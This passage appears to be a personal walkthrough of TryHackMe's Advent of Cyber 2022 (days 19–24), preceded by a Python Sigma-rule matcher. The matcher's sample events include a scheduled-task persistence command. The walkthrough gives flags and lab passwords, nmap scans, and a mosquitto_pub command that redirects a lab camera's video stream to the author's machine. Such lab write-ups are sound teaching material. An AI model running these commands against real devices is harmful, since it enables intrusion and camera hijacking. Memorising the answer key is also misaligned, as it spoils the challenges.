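    {"id": "e3", "EventID": 1, "Image": r"C:\Windows\System32\schtasks.exe",
     "CommandLine": r"schtasks /create /tn Updater /tr C:\Users\Public\x.exe /sc onlogon"},
    {"id": "e4", "EventID": 1, "Image": r"C:\Windows\System32\schtasks.exe",
     "CommandLine": "schtasks /query /tn Updater"},   # benign: lists, does not create
    {"id": "e5", "EventID": 4624, "TargetUserName": "BanditYetiMini"},  # logon, not creation
]


def _compare(actual, expected, modifiers):
    """Apply the value-level modifiers of one field (case-insensitive, like Sigma)."""
    a, v = str(actual).lower(), str(expected).lower()
    if "contains" in modifiers:
        return v in a
    if "endswith" in modifiers:
        return a.endswith(v)
    if "startswith" in modifiers:
        return a.startswith(v)
    return a == v


def field_matches(spec_key, spec_value, event):
    """`Field|mod1|mod2: value-or-list`. A list is OR unless |all is present."""
    field, *modifiers = spec_key.split("|")
    if field not in event:
        return False
    values = spec_value if isinstance(spec_value, list) else [spec_value]
    results = [_compare(event[field], v, modifiers) for v in values]
    return all(results) if "all" in modifiers else any(results)


def rule_matches(rule, event):
    detection = rule["detection"]
    if detection.get("condition") != "selection":
        raise NotImplementedError("only `condition: selection` is supported in this example")
    # Every field inside a selection must match (implicit AND between fields).
    return all(field_matches(k, v, event) for k, v in detection["selection"].items())


def run_rules(rules, events):
    """Map each rule title to the ids of the events it fires on."""
    return {r["title"]: [e["id"] for e in events if rule_matches(r, e)] for r in rules}


if __name__ == "__main__":
    for title, hits in run_rules(RULES, EVENTS).items():
        print(f"{title}: {hits}")
```

Note that `Image|endswith: 'schtasks.exe'` (without a leading backslash) would also match an image named `notschtasks.exe`; anchoring on `\schtasks.exe`, as the reg.exe rule does, is the tighter choice.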

Task 24: [Day 19] Hardware Hacking – Wiggles go brrr

Task 24.1 – Read through this section and follow the instructions provided.

Task 24.2 – Click Start Machine to start the machine.

Task 24.3 – Click Show Split View at the top of the page to connect to the machine.

Question 24.1 – What device can be used to probe the signals being sent on electrical wires between two devices?

Answer 24.1 – logic analyser

Question 24.2 – USART is faster than SPI for communication? (Yea,Nay)

Answer 24.2 – Nay

Question 24.3 – USART communication uses fewer wires than SPI? (Yea,Nay)

Answer 24.3 – Yea

Question 24.4 – USART is faster than I2C for communication? (Yea,Nay)

Answer 24.4 – Nay

Question 24.5 – I2C uses more wires than SPI for communication? (Yea,Nay)

Answer 24.5 – Nay

Question 24.6 – SPI is faster than I2C for communication? (Yea,Nay)

Answer 24.6 – Yea

Question 24.7 – What is the maximum number of devices that can be connected on a single pair of I2C lines?

Answer 24.7 – 1008

Question 24.8 – What is the new baud rate that is negotiated between the microprocessor and ESP32 chip?

Answer 24.8 – 9600

Question 24.9 – What is the flag that is transmitted once the new baud rate was accepted?

Answer 24.9 – THM{Hacking.Hardware.Is.Fun}

Question 24.10 – Looking for a challenge? Try our Recent Threats module!

Answer 24.10 – Click the Submit button to progress to the next task.

Task 25: [Day 20] Firmware – Binwalkin’ around the Christmas tree

Task 25.1 – Read through this section and follow the instructions provided.

Task 25.2 – Click Start Machine to start the machine.

Task 25.3 – Click Show Split View at the top of the page to connect to the machine.

Question 25.1 – What is the flag value after reversing the file firmwarev2.2-encrypted.gpg? Note: The flag contains underscores – if you’re seeing spaces, the underscores might not be rendering.

Answer 25.1 – THM{WE_GOT_THE_FIRMWARE_CODE}

Explanation 25.1 – I ran the following command to obtain this answer: `grep -ir thm`

Question 25.2 – What is the Paraphrase value for the binary firmwarev1.0_unsigned?

Answer 25.2 – [email protected]

Explanation 25.2 – I ran the following command to obtain this answer: `grep -ir paraphrase`

Question 25.3 – After reversing the encrypted firmware, can you find the build number for rootfs?

Answer 25.3 – 2.6.31

Explanation 25.3 – I ran the following command to obtain this answer: `grep -ir build`

Question 25.4 – Did you know we have a wonderful community on Discord? If you join us there, you can count on nice conversation, cyber security tips & tricks, and room help from our mods and mentors. Our Discord admin has some rooms out, too – you can try an easy one or a hard one!

Answer 25.4 – Click the Submit button to progress to the next task.

Task 26: [Day 21] MQTT – Have yourself a merry little webcam

Task 26.1 – Read through this section and follow the instructions provided.

Task 26.2 – Click Start Machine to start the machine.

Task 26.3 – Access the machine via its IP address over the VPN. Alternatively, you can use the built-in AttackBox.

Question 26.1 – What port is Mosquitto running on?

Answer 26.1 – 1883

Explanation 26.1 – I ran the following command to obtain the answer above: `nmap -p- <Target IP> -vv --min-rate 1500`

Question 26.2 – Is the device/init topic enumerated by Nmap during a script scan of all ports? (y/n)

Answer 26.2 – y

Explanation 26.2 – I ran the following command to obtain the answer above: `nmap -sC -sV -p- <Target IP> -vv --min-rate 1500`

Question 26.3 – What Mosquitto version is the device using?

Answer 26.3 – 1.6.9

Explanation 26.3 – I ran the following command to obtain the answer above: `nmap -sC -sV -p- <Target IP> -vv --min-rate 1500`

Question 26.4 – What flag is obtained from viewing the RTSP stream?

Answer 26.4 – THM{UR_CAMERA_IS_MINE}

Explanation 26.4 – I ran the following command to start the RTSP server on my AttackBox: `docker run --rm -it --network=host aler9/rtsp-simple-server`. Next, I sent the command to the remote device to redirect the RTSP stream to my AttackBox: `mosquitto_pub -h 10.10.148.98 -t /device/PW5UAMREVWA7VXJ4EYBY/cmd -m """{"cmd":"10","url":"rtsp://10.10.71.97:8554/thm"}"""`. However, after trying this multiple times, it did not work. Ultimately, I had to refer to the walkthrough video to get the answer to the above question.

Question 26.5 – If you want to learn more check out the Command Injection room or the Vulnerability Research module!

Answer 26.5 – Click the Submit button to progress to the next task.

Task 27: [Day 22] Attack Surface Reduction – Threats are failing all around me

Task 27.1 – Read through this section and follow the instructions provided.

Task 27.2 – Click Start Machine to start the machine.

Task 27.3 – Click View Site to visit the task’s site.

Question 27.1 – Follow the instructions in the attached static site to help McSkidy reduce her attack surface against attacks from the Yeti. Use the flag as an answer to complete the task.

Answer 27.1 – THM{4TT4CK SURF4C3 R3DUC3D}

Question 27.2 – If you’d like to study cyber defense more, why not start with the Threat and Vulnerability Management module?

Answer 27.2 – Click the Submit button to progress to the next task.

Task 28: [Day 23] Defense in Depth – Mission ELFPossible: Abominable for a Day

Task 28.1 – Read through this section and follow the instructions provided.

Task 28.2 – Click Start Machine to start the machine.

Task 28.3 – Click View Site to visit the task’s site.

Question 28.1 – Case 1: What is the password for Santa’s Vault?

Answer 28.1 – [email protected]

Question 28.2 – Case 1: What is the Flag?

Answer 28.2 – THM{[email protected]!}

Question 28.3 – Case 2: What is Santa’s favorite thing?

Answer 28.3 – MilkAndCookies

Question 28.4 – Case 2: What is the password for Santa’s Vault?

Answer 28.4 – 3XtrR@[email protected]

Question 28.5 – Case 2: What is the Flag?

Answer 28.5 – THM{[email protected]_5t3pS_n0w!}

Question 28.6 – Case 3: What is the Executive Assistant’s favorite thing?

Answer 28.6 – BanoffeePie

Question 28.7 – Case 3: What is Santa’s previous password?

Answer 28.7 – [email protected]_01

Question 28.8 – Case 3: What is Santa’s current password?

Answer 28.8 – [email protected]_02

Question 28.9 – Case 3: What is the 1st part of the vault’s password?

Answer 28.9 – N3w4nd1m

Question 28.10 – Case 3: What is the 2nd part of the vault’s password?

Answer 28.10 – [email protected]

Question 28.11 – Case 3: What is the password for Santa’s Vault?

Answer 28.11 – [email protected]@ultPW

Question 28.12 – Case 3: What is the Flag?

Answer 28.12 – THM{[email protected][email protected]}

Question 28.13 – What is Santa’s Code?

Answer 28.13 – 2845

Question 28.14 – Mission ELFPossible: What is the Abominable for a Day Flag?

Answer 28.14 – THM{D3f3n5e_1n_D3pth_1s_k00L!!}

Question 28.15 – If you’d like to learn more about mitigating and managing potential adversary actions, check out the Cyber Threat Intelligence module! 

Answer 28.15 – Click the Submit button to progress to the next task.

Task 29: [Day 24] Feedback – Ho, ho, ho, the survey’s short

Task 29.1 – Read through this section and follow the instructions provided.

Question 29.1 – Please help us improve by answering this 5-minute survey. Make sure to grab the flag before you click “Submit”!

Answer 29.1 – THM{AoC2022!thank_you!}

Question 29.2 – Continue learning with the Pre Security, Jr Penetration Tester, or SOC Level 1 pathway!

Answer 29.2 – Click the Submit button to progress to the next task.

Question 29.3 – The prize winners will be announced on the 28th of December – you have until then to complete the tasks. Remember, the more questions you answer, the higher your chance of winning! The daily prize winners for the last week of the event will be announced on Twitter on Wednesday, December 28th.

Answer 29.3 – Click the Submit button to progress to the next task.

Task 30: [Day 24] The End – The Year of the Bandit Yeti

Task 30.1 – Read through this section and follow the instructions provided.

Question 30.1 – Are you ready to continue your learning journey on TryHackMe? (Yea,Yea)

Answer 30.1 – Yea

My Conclusion

The Advent of Cyber 2022 event was a fun and educational experience for me. It covered a wide range of topics, including red teaming, secure coding, web vulnerabilities, blue teaming, and IoT hacking, and gave me a better understanding of how to identify, prevent, and respond to cyber threats. I highly recommend this event, and similar ones on the TryHackMe platform, to anyone interested in learning more about cybersecurity.